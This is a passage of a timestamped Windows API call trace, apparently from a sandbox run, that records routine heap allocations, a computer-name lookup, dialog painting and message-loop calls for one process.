0xd9b0c8 [0268.518] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0e0 [0268.518] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b90 [0268.518] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b098 [0268.518] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffef0 [0268.526] NetApiBufferSize (in: Buffer=0xdabb50, ByteCount=0x75e308 | out: ByteCount=0x75e308) returned 0x0 [0268.526] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe50 [0268.526] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x214) returned 0xbc73f0 [0268.526] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b020 [0268.527] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98ad0 [0268.527] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9afd8 [0268.527] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aff0 [0268.527] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe20 [0268.537] GetComputerNameW (in: lpBuffer=0x75f128, nSize=0x75f444 | out: lpBuffer="XDUWTFONO", nSize=0x75f444) returned 1 [0268.537] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b2a8 [0268.537] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfb20 [0268.537] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xe00020 [0268.588] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.588] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.588] NtdllDialogWndProc_W () returned 0x0 [0268.631] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.631] NtdllDialogWndProc_W () returned 0x0 [0268.633] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.633] NtdllDialogWndProc_W () returned 0x0 [0268.633] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.633] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.633] NtdllDialogWndProc_W () returned 0x0 [0268.634] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.634] NtdllDialogWndProc_W () returned 0x0 [0268.634] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.634] NtdllDialogWndProc_W () returned 0x0 [0268.635] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.635] NtdllDialogWndProc_W () returned 0x0 [0268.637] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.637] NtdllDialogWndProc_W () returned 0x1 [0268.637] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.637] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.637] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.637] SetBkColor (hdc=0x8101070d, color=0xf0f0f0) returned 0xffffff [0268.637] CreateSolidBrush (color=0xf0f0f0) returned 0x281001ca [0268.637] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b188 [0268.637] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b1b8 [0268.638] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.638] NtdllDialogWndProc_W () returned 0x0 [0268.639] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.639] NtdllDialogWndProc_W () returned 0x0 [0268.641] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.641] NtdllDialogWndProc_W () returned 0x0 [0268.643] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.643] NtdllDialogWndProc_W () returned 0x1 [0268.644] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.644] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.644] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.644] SetBkColor (hdc=0x8101070d, color=0xf0f0f0) returned 0xf0f0f0 [0268.644] GetForegroundWindow () returned 0xa0170 [0268.644] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b200 | out: hHeap=0xb80000) returned 1 [0268.644] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfb20 | out: hHeap=0xb80000) returned 1 [0268.644] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.644] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.645] NtdllDialogWndProc_W () returned 0x0 [0268.645] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.645] NtdllDialogWndProc_W () returned 0x0 [0268.645] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.645] NtdllDialogWndProc_W () returned 0x0 [0268.645] TranslateMessage (lpMsg=0x75f90c) returned 0 [0268.645] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0268.645] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.645] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.645] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.645] NtdllDialogWndProc_W () returned 0x0 [0268.646] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0268.646] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.646] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.646] NtdllDialogWndProc_W () returned 0x0 [0268.646] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.646] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0268.646] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.646] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.646] BeginPaint (in: hWnd=0xa0170, lpPaint=0x75f600 | out: lpPaint=0x75f600) returned 0x8101070d [0268.646] EndPaint (hWnd=0xa0170, lpPaint=0x75f600) returned 1 [0268.647] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.647] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0268.647] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.647] NtdllDialogWndProc_W () returned 0x1 [0268.647] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.647] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.648] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.648] SetBkColor (hdc=0x240101eb, color=0xf0f0f0) returned 0xffffff [0268.648] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.648] NtdllDialogWndProc_W () returned 0x0 [0268.648] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.648] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.648] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.648] SetBkColor (hdc=0x240101eb, color=0xf0f0f0) returned 0xf0f0f0 [0268.648] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.648] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.648] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0268.648] NtdllDialogWndProc_W () returned 0x0 [0268.648] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.648] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.648] GetWindowLongW (hWnd=0x90150, nIndex=-21) returned 3 [0268.648] NtdllDialogWndProc_W () returned 0x0 [0268.649] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.649] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0268.649] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.649] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.649] GetWindowLongW (hWnd=0x60168, nIndex=-21) returned 4 [0268.649] GetWindowLongW (hWnd=0x60168, nIndex=-21) returned 4 [0268.649] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.649] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0x0 [0268.649] SetBkColor (hdc=0x270101c5, color=0x0) returned 0xffffff [0268.650] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.650] NtdllDialogWndProc_W () returned 0x1 [0268.650] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.650] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.650] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.650] SetBkColor (hdc=0x270101c5, color=0xf0f0f0) returned 0x0 [0268.650] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.650] NtdllDialogWndProc_W () returned 0x0 [0268.652] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.652] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.652] GetWindowLongW (hWnd=0x60168, nIndex=-21) returned 4 [0268.652] GetWindowLongW (hWnd=0x60168, nIndex=-21) returned 4 [0268.652] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.652] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0x0 [0268.652] SetBkColor (hdc=0x270101c5, color=0x0) returned 0xffffff [0268.652] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.652] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.652] GetWindowLongW (hWnd=0x60168, nIndex=-21) returned 4 [0268.652] GetWindowLongW (hWnd=0x60168, nIndex=-21) returned 4 [0268.652] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.652] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0xff00 [0268.653] SetBkColor (hdc=0x270101c5, color=0x0) returned 0x0 [0268.653] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.653] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.653] GetWindowLongW (hWnd=0x60168, nIndex=-21) returned 4 [0268.653] GetWindowLongW (hWnd=0x60168, nIndex=-21) returned 4 [0268.653] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.653] SetTextColor (hdc=0x270101c5, color=0xff00) returned 0xff00 [0268.653] SetBkColor (hdc=0x270101c5, color=0x0) returned 0x0 [0268.663] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.663] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0268.664] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.664] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.664] GetWindowLongW (hWnd=0x6016a, nIndex=-21) returned 5 [0268.664] GetWindowLongW (hWnd=0x6016a, nIndex=-21) returned 5 [0268.664] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.664] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0268.664] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0268.667] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.667] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0268.667] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.667] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.667] GetWindowLongW (hWnd=0x6015e, nIndex=-21) returned 6 [0268.667] GetWindowLongW (hWnd=0x6015e, nIndex=-21) returned 6 [0268.667] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.667] GetWindowLongW (hWnd=0x6015e, nIndex=-16) returned 1342242944 [0268.668] GetSysColor (nIndex=5) returned 0xffffff [0268.668] GetSysColor (nIndex=8) returned 0x0 [0268.668] SetTextColor (hdc=0x43010772, color=0x0) returned 0x0 [0268.668] SetBkColor (hdc=0x43010772, color=0xffffff) returned 0xffffff [0268.668] CreateSolidBrush (color=0xffffff) returned 0xffffffff8f100708 [0268.668] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b200 [0268.668] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9b1d0 [0268.668] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.668] NtdllDialogWndProc_W () returned 0x1 [0268.668] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.668] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.668] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.668] SetBkColor (hdc=0x490101cc, color=0xf0f0f0) returned 0xffffff [0268.669] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.669] NtdllDialogWndProc_W () returned 0x0 [0268.670] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.670] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.670] GetWindowLongW (hWnd=0x6015e, nIndex=-21) returned 6 [0268.670] GetWindowLongW (hWnd=0x6015e, nIndex=-21) returned 6 [0268.670] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.670] GetWindowLongW (hWnd=0x6015e, nIndex=-16) returned 1342242944 [0268.670] GetSysColor (nIndex=5) returned 0xffffff [0268.670] GetSysColor (nIndex=8) returned 0x0 [0268.670] SetTextColor (hdc=0x4a0101cc, color=0x0) returned 0x0 [0268.670] SetBkColor (hdc=0x4a0101cc, color=0xffffff) returned 0xffffff [0268.676] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.676] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0268.676] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.676] NtdllDialogWndProc_W () returned 0x1 [0268.676] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.677] SetBkColor (hdc=0x4b0101cc, color=0xf0f0f0) returned 0xffffff [0268.677] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] NtdllDialogWndProc_W () returned 0x0 [0268.677] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.677] SetBkColor (hdc=0x4b0101cc, color=0xf0f0f0) returned 0xf0f0f0 [0268.677] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] GetWindowLongW (hWnd=0x6010a, nIndex=-21) returned 7 [0268.677] NtdllDialogWndProc_W () returned 0x0 [0268.677] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.677] GetWindowLongW (hWnd=0x6010a, nIndex=-21) returned 7 [0268.677] NtdllDialogWndProc_W () returned 0x0 [0268.678] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.678] IsDialogMessageW (hDlg=0xa0170, lpMsg=0x75f90c) returned 1 [0268.678] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.678] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.678] GetWindowLongW (hWnd=0x700a2, nIndex=-21) returned 8 [0268.678] GetWindowLongW (hWnd=0x700a2, nIndex=-21) returned 8 [0268.678] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.678] GetWindowLongW (hWnd=0x700a2, nIndex=-16) returned 1342179332 [0268.678] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.678] GetSysColor (nIndex=8) returned 0x0 [0268.678] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0268.678] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0268.681] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.681] NtdllDialogWndProc_W () returned 0x1 [0268.681] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.681] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.681] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.681] SetBkColor (hdc=0x260101eb, color=0xf0f0f0) returned 0xffffff [0268.681] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.681] NtdllDialogWndProc_W () returned 0x0 [0268.682] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.682] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.682] GetWindowLongW (hWnd=0x700a2, nIndex=-21) returned 8 [0268.682] GetWindowLongW (hWnd=0x700a2, nIndex=-21) returned 8 [0268.682] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.682] GetWindowLongW (hWnd=0x700a2, nIndex=-16) returned 1342179332 [0268.682] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.682] GetSysColor (nIndex=8) returned 0x0 [0268.682] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0268.682] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xffffff [0268.683] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.683] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.683] GetWindowLongW (hWnd=0x700a2, nIndex=-21) returned 8 [0268.683] GetWindowLongW (hWnd=0x700a2, nIndex=-21) returned 8 [0268.683] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.683] GetWindowLongW (hWnd=0x700a2, nIndex=-16) returned 1342179332 [0268.683] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.683] GetSysColor (nIndex=8) returned 0x0 [0268.683] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0268.683] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xf0f0f0 [0268.683] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.683] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.683] GetWindowLongW (hWnd=0x700a2, nIndex=-21) returned 8 [0268.683] GetWindowLongW (hWnd=0x700a2, nIndex=-21) returned 8 [0268.683] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.683] GetWindowLongW (hWnd=0x700a2, nIndex=-16) returned 1342179332 [0268.683] GetSysColor (nIndex=15) returned 0xf0f0f0 [0268.683] GetSysColor (nIndex=8) returned 0x0 [0268.683] SetTextColor (hdc=0xd010720, color=0x0) returned 0x0 [0268.683] SetBkColor (hdc=0xd010720, color=0xf0f0f0) returned 0xf0f0f0 [0268.686] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 1 [0268.686] TranslateMessage (lpMsg=0x75f90c) returned 0 [0268.686] DispatchMessageW (lpMsg=0x75f90c) returned 0x0 [0268.686] GetForegroundWindow () returned 0xa0170 [0268.686] GetWindowLongW (hWnd=0xa0170, nIndex=-21) returned 0 [0268.686] GetCursorPos (in: lpPoint=0x75f748 | out: lpPoint=0x75f748*(x=546, y=527)) returned 1 [0268.686] ScreenToClient (in: hWnd=0xa0170, lpPoint=0x75f748 | out: lpPoint=0x75f748) returned 1 [0268.686] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x24) returned 0xdabb80 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0c8 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdfff00 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdfff30 [0268.687] GetAsyncKeyState (vKey=1) returned 0 [0268.687] GetAsyncKeyState (vKey=2) returned 0 [0268.687] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfb20 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b068 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffea0 [0268.687] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b068 | out: hHeap=0xb80000) returned 1 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf788 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b068 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b60 [0268.687] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffef0 [0268.687] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffef0 | out: hHeap=0xb80000) returned 1 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffef0 [0268.688] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffef0 | out: hHeap=0xb80000) returned 1 [0268.688] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98b60 | out: hHeap=0xb80000) returned 1 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffef0 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x214) returned 0xbc73f0 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe70 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe30 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b60 [0268.688] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe30 | out: hHeap=0xb80000) returned 1 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b90 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b098 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0b0 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe30 [0268.688] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.690] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98b60 | out: hHeap=0xb80000) returned 1 [0268.690] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.690] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98b60 [0268.690] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0e0 [0268.690] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98d70 [0268.690] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe40 [0268.690] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98d70 | out: hHeap=0xb80000) returned 1 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0e0 | out: hHeap=0xb80000) returned 1 [0268.691] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddf760 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0e0 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe40 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe20 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x6) returned 0xdffe40 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x82) returned 0xbcb1e0 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe10 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbcb1e0 | out: hHeap=0xb80000) returned 1 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe10 | out: hHeap=0xb80000) returned 1 [0268.691] CreateAcceleratorTableW (paccel=0xdffe40, cAccel=1) returned 0x19010b [0268.691] GetForegroundWindow () returned 0xa0170 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe20 | out: hHeap=0xb80000) returned 1 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0e0 | out: hHeap=0xb80000) returned 1 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddf760 | out: hHeap=0xb80000) returned 1 [0268.691] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.691] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe20 [0268.691] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe20 | out: hHeap=0xb80000) returned 1 [0268.691] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x38) returned 0xe179e0 [0268.692] PeekMessageW (in: lpMsg=0x75f90c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f90c) returned 0 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffe20 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b0e0 [0268.692] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffe40 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff30 | out: hHeap=0xb80000) returned 1 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0c8 | out: hHeap=0xb80000) returned 1 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdfff00 | out: hHeap=0xb80000) returned 1 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdabb80 | out: hHeap=0xb80000) returned 1 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b0e0 | out: hHeap=0xb80000) returned 1 [0268.692] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffe40 | out: hHeap=0xb80000) returned 1 [0268.692] HeapFree (in: hHeap=0xb80000, 